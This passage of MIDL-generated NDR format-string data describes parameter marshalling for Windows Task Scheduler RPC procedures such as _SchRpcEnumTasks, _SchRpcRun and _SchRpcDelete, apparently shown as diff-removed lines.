/* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 376 */ NdrFcShort( 0x1 ), /* 1 */ -/* 378 */ NdrFcShort( 0x0 ), /* 0 */ -/* 380 */ NdrFcShort( 0x0 ), /* 0 */ -/* 382 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 384 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 386 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 388 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 390 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 392 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 394 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 396 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ -/* 398 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 400 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 402 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 404 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 406 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 408 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 410 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 412 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 414 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 416 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 418 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ - - /* Parameter arg_6 */ - -/* 420 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 422 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 424 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumTasks */ - - - /* Return value */ - -/* 426 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 428 */ NdrFcLong( 0x0 ), /* 0 */ -/* 432 */ NdrFcShort( 0x7 ), /* 7 */ -/* 434 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 436 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 438 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 440 */ NdrFcShort( 0x2c ), /* 44 */ -/* 442 */ NdrFcShort( 0x40 ), /* 64 */ -/* 444 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x7, /* 7 */ -/* 446 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 448 */ NdrFcShort( 0x1 ), /* 1 */ -/* 450 */ NdrFcShort( 0x0 ), /* 0 */ -/* 452 */ NdrFcShort( 0x0 ), /* 0 */ -/* 454 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 456 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 458 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 460 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 462 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 464 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 466 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 468 */ NdrFcShort( 0x158 ), /* Flags: in, out, base type, simple ref, */ -/* 470 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 472 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 474 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 476 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 478 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 480 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 482 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 484 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 486 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 488 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 490 */ NdrFcShort( 0x64 ), /* Type Offset=100 */ - - /* Parameter arg_6 */ - -/* 492 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 494 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 496 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcEnumInstances */ - - - /* Return value */ - -/* 498 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 500 */ NdrFcLong( 0x0 ), /* 0 */ -/* 504 */ NdrFcShort( 0x8 ), /* 8 */ -/* 506 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 508 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 510 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 512 */ NdrFcShort( 0x8 ), /* 8 */ -/* 514 */ NdrFcShort( 0x24 ), /* 36 */ -/* 516 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 518 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 520 */ NdrFcShort( 0x1 ), /* 1 */ -/* 522 */ NdrFcShort( 0x0 ), /* 0 */ -/* 524 */ NdrFcShort( 0x0 ), /* 0 */ -/* 526 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 528 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 530 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 532 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 534 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 536 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 538 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 540 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 542 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 544 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 546 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 548 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 550 */ NdrFcShort( 0x82 ), /* Type Offset=130 */ - - /* Parameter arg_4 */ - -/* 552 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 554 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 556 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetInstanceInfo */ - - - /* Return value */ - -/* 558 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 560 */ NdrFcLong( 0x0 ), /* 0 */ -/* 564 */ NdrFcShort( 0x9 ), /* 9 */ -/* 566 */ NdrFcShort( 0x50 ), /* X64 Stack size/offset = 80 */ -/* 568 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 570 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 572 */ NdrFcShort( 0x44 ), /* 68 */ -/* 574 */ NdrFcShort( 0x5c ), /* 92 */ -/* 576 */ 0x45, /* Oi2 Flags: srv must size, has return, has ext, */ - 0x9, /* 9 */ -/* 578 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 580 */ NdrFcShort( 0x1 ), /* 1 */ -/* 582 */ NdrFcShort( 0x0 ), /* 0 */ -/* 584 */ NdrFcShort( 0x0 ), /* 0 */ -/* 586 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 588 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ -/* 590 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 592 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_1 */ - -/* 594 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 596 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 598 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_2 */ - -/* 600 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 602 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 604 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 606 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 608 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 610 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_4 */ - -/* 612 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 614 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 616 */ NdrFcShort( 0x3e ), /* Type Offset=62 */ - - /* Parameter arg_5 */ - -/* 618 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 620 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 622 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 624 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 626 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 628 */ NdrFcShort( 0xb6 ), /* Type Offset=182 */ - - /* Parameter arg_7 */ - -/* 630 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 632 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 634 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_8 */ - -/* 636 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 638 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 640 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcStopInstance */ - - - /* Return value */ - -/* 642 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 644 */ NdrFcLong( 0x0 ), /* 0 */ -/* 648 */ NdrFcShort( 0xa ), /* 10 */ -/* 650 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 652 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 654 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 656 */ NdrFcShort( 0x4c ), /* 76 */ -/* 658 */ NdrFcShort( 0x8 ), /* 8 */ -/* 660 */ 0x44, /* Oi2 Flags: has return, has ext, */ - 0x3, /* 3 */ -/* 662 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 664 */ NdrFcShort( 0x0 ), /* 0 */ -/* 666 */ NdrFcShort( 0x0 ), /* 0 */ -/* 668 */ NdrFcShort( 0x0 ), /* 0 */ -/* 670 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 672 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */ -/* 674 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 676 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_1 */ - -/* 678 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 680 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 682 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 684 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 686 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 688 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcStop */ - - - /* Return value */ - -/* 690 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 692 */ NdrFcLong( 0x0 ), /* 0 */ -/* 696 */ NdrFcShort( 0xb ), /* 11 */ -/* 698 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 700 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 702 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 704 */ NdrFcShort( 0x8 ), /* 8 */ -/* 706 */ NdrFcShort( 0x8 ), /* 8 */ -/* 708 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 710 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 712 */ NdrFcShort( 0x0 ), /* 0 */ -/* 714 */ NdrFcShort( 0x0 ), /* 0 */ -/* 716 */ NdrFcShort( 0x0 ), /* 0 */ -/* 718 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 720 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 722 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 724 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_1 */ - -/* 726 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 728 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 730 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 732 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 734 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 736 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRun */ - - - /* Return value */ - -/* 738 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 740 */ NdrFcLong( 0x0 ), /* 0 */ -/* 744 */ NdrFcShort( 0xc ), /* 12 */ -/* 746 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 748 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 750 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 752 */ NdrFcShort( 0x18 ), /* 24 */ -/* 754 */ NdrFcShort( 0x4c ), /* 76 */ -/* 756 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x8, /* 8 */ -/* 758 */ 0xa, /* 10 */ - 0x5, /* Ext Flags: new corr desc, srv corr check, */ -/* 760 */ NdrFcShort( 0x0 ), /* 0 */ -/* 762 */ NdrFcShort( 0x1 ), /* 1 */ -/* 764 */ NdrFcShort( 0x0 ), /* 0 */ -/* 766 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 768 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 770 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 772 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 774 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 776 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 778 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 780 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 782 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 784 */ NdrFcShort( 0xd4 ), /* Type Offset=212 */ - - /* Parameter arg_3 */ - -/* 786 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 788 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 790 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 792 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 794 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 796 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 798 */ NdrFcShort( 0xb ), /* Flags: must size, must free, in, */ -/* 800 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 802 */ NdrFcShort( 0x6 ), /* Type Offset=6 */ - - /* Parameter arg_6 */ - -/* 804 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ -/* 806 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 808 */ NdrFcShort( 0x90 ), /* Type Offset=144 */ - - /* Parameter arg_7 */ - -/* 810 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 812 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 814 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcDelete */ - - - /* Return value */ - -/* 816 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 818 */ NdrFcLong( 0x0 ), /* 0 */ -/* 822 */ NdrFcShort( 0xd ), /* 13 */ -/* 824 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 826 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 828 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 830 */ NdrFcShort( 0x8 ), /* 8 */ -/* 832 */ NdrFcShort( 0x8 ), /* 8 */ -/* 834 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x3, /* 3 */ -/* 836 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 838 */ NdrFcShort( 0x0 ), /* 0 */ -/* 840 */ NdrFcShort( 0x0 ), /* 0 */ -/* 842 */ NdrFcShort( 0x0 ), /* 0 */ -/* 844 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 846 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 848 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 850 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 852 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 854 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 856 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 858 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 860 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 862 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcRename */ - - - /* Return value */ - -/* 864 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 866 */ NdrFcLong( 0x0 ), /* 0 */ -/* 870 */ NdrFcShort( 0xe ), /* 14 */ -/* 872 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 874 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 876 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 878 */ NdrFcShort( 0x8 ), /* 8 */ -/* 880 */ NdrFcShort( 0x8 ), /* 8 */ -/* 882 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 884 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 886 */ NdrFcShort( 0x0 ), /* 0 */ -/* 888 */ NdrFcShort( 0x0 ), /* 0 */ -/* 890 */ NdrFcShort( 0x0 ), /* 0 */ -/* 892 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 894 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 896 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 898 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 900 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 902 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 904 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_2 */ - -/* 906 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 908 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 910 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 912 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 914 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 916 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcScheduledRuntimes */ - - - /* Return value */ - -/* 918 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 920 */ NdrFcLong( 0x0 ), /* 0 */ -/* 924 */ NdrFcShort( 0xf ), /* 15 */ -/* 926 */ NdrFcShort( 0x48 ), /* X64 Stack size/offset = 72 */ -/* 928 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 930 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 932 */ NdrFcShort( 0x78 ), /* 120 */ -/* 934 */ NdrFcShort( 0x24 ), /* 36 */ -/* 936 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */ - 0x8, /* 8 */ -/* 938 */ 0xa, /* 10 */ - 0x3, /* Ext Flags: new corr desc, clt corr check, */ -/* 940 */ NdrFcShort( 0x1 ), /* 1 */ -/* 942 */ NdrFcShort( 0x0 ), /* 0 */ -/* 944 */ NdrFcShort( 0x0 ), /* 0 */ -/* 946 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 948 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 950 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 952 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 954 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ -/* 956 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 958 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ - - /* Parameter arg_2 */ - -/* 960 */ NdrFcShort( 0xa ), /* Flags: must free, in, */ -/* 962 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 964 */ NdrFcShort( 0xf2 ), /* Type Offset=242 */ - - /* Parameter arg_3 */ - -/* 966 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 968 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 970 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 972 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 974 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 976 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_5 */ - -/* 978 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 980 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 982 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_6 */ - -/* 984 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */ -/* 986 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */ -/* 988 */ NdrFcShort( 0x104 ), /* Type Offset=260 */ - - /* Parameter arg_7 */ - -/* 990 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 992 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */ -/* 994 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetLastRunInfo */ - - - /* Return value */ - -/* 996 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 998 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1002 */ NdrFcShort( 0x10 ), /* 16 */ -/* 1004 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 1006 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1008 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1010 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1012 */ NdrFcShort( 0x58 ), /* 88 */ -/* 1014 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x4, /* 4 */ -/* 1016 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1018 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1020 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1022 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1024 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1026 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1028 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1030 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1032 */ NdrFcShort( 0x4112 ), /* Flags: must free, out, simple ref, srv alloc size=16 */ -/* 1034 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1036 */ NdrFcShort( 0xf6 ), /* Type Offset=246 */ - - /* Parameter arg_2 */ - -/* 1038 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1040 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1042 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 1044 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1046 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1048 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure _SchRpcGetTaskInfo */ - - - /* Return value */ - -/* 1050 */ 0x0, /* 0 */ - 0x48, /* Old Flags: */ -/* 1052 */ NdrFcLong( 0x0 ), /* 0 */ -/* 1056 */ NdrFcShort( 0x11 ), /* 17 */ -/* 1058 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */ -/* 1060 */ 0x32, /* FC_BIND_PRIMITIVE */ - 0x0, /* 0 */ -/* 1062 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */ -/* 1064 */ NdrFcShort( 0x8 ), /* 8 */ -/* 1066 */ NdrFcShort( 0x40 ), /* 64 */ -/* 1068 */ 0x46, /* Oi2 Flags: clt must size, has return, has ext, */ - 0x5, /* 5 */ -/* 1070 */ 0xa, /* 10 */ - 0x1, /* Ext Flags: new corr desc, */ -/* 1072 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1074 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1076 */ NdrFcShort( 0x0 ), /* 0 */ -/* 1078 */ NdrFcShort( 0x0 ), /* 0 */ - - /* Parameter IDL_handle */ - -/* 1080 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */ -/* 1082 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */ -/* 1084 */ NdrFcShort( 0xc ), /* Type Offset=12 */ - - /* Parameter arg_1 */ - -/* 1086 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */ -/* 1088 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */ -/* 1090 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_2 */ - -/* 1092 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1094 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */ -/* 1096 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_3 */ - -/* 1098 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */ -/* 1100 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */ -/* 1102 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Parameter arg_4 */ - -/* 1104 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */ -/* 1106 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */ -/* 1108 */ 0x8, /* FC_LONG */ - 0x0, /* 0 */ - - /* Procedure 